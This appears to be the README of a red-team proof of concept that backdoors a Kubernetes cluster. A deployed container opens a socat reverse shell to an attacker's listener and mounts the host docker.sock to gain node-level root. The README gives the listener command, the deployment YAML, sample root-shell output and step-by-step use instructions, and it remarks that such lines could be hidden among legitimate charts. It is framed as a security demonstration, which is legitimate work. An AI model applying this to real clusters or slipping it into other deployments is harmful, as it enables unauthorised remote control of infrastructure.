Home

Awesome

This is a proof of concept aimed to demonstrate the need to implement containter inspection, network security policies, etc. in a Kubernetes cluster. Also a reminder to always review carefully what a docker container or kubernetes deployment /helm chart is actually installing in our cluster. The few lines of code to bring up the reverse shell could be really easily mixed inbetween legitimate charts and deployments so only careful inspection would make them apparent.

This deployment launches a docker container (see Dockerfile)/ When the docker container starts it sends a reverse shell with socat to the specified addres and port. If your destination server is listening for that connection, like this, for example:

    socat file:`tty`,raw,echo=0 tcp-listen:9532

At this point we have direct access to the docker. The fun part of the deal though is that the deployment also assigned the container the same security group id as the kubernetes nodes, like this:

    spec:
      securityContext:
        fsGroup: 412    # Group ID of docker group on k8s nodes.
      containers:
        - name: gkpown
          image: [repo]/redteam-gkpown
          imagePullPolicy: Always
          volumeMounts:
            - name: dockersock 
              mountPath:   "/var/run/docker.sock"
      volumes:
      - name: dockersock 
        hostPath:
path: /var/run/docker.sock

So we should have access to all the node context.You can check it very easily:

tux at basecamp in ~/code/github/redteam-gkpown (master●●)
$  socat file:`tty`,raw,echo=0 tcp-listen:9532
/bin/sh: can't access tty; job control turned off
/gkpown # 
/gkpown # 
/gkpown # 
/gkpown # 
/gkpown # whoami
root
/gkpown # df -h
Filesystem                Size      Used Available Use% Mounted on
overlay                  25.4G     18.3G      7.0G  72% /
tmpfs                     6.4G         0      6.4G   0% /dev
tmpfs                     6.4G         0      6.4G   0% /sys/fs/cgroup
/dev/sda1                25.4G     18.3G      7.0G  72% /dev/termination-log
/dev/sda1                25.4G     18.3G      7.0G  72% /etc/resolv.conf
/dev/sda1                25.4G     18.3G      7.0G  72% /etc/hostname
/dev/sda1                25.4G     18.3G      7.0G  72% /etc/hosts
shm                      64.0M         0     64.0M   0% /dev/shm
tmpfs                     6.4G      2.0M      6.4G   0% /run/docker.sock
tmpfs                     6.4G     12.0K      6.4G   0% /run/secrets/kubernetes.io/serviceaccount
tmpfs                     6.4G         0      6.4G   0% /proc/kcore
tmpfs                     6.4G         0      6.4G   0% /proc/timer_list
tmpfs                     6.4G         0      6.4G   0% /sys/firmware

How to use this:

change the XX's in ./gkpow/socat-shell.sh for your own listener IP, build the container (docker build ), change the target image in deployment.yaml so it points to your own image and apply the deployment in the cluster (kubectl apply -f deployment.yaml)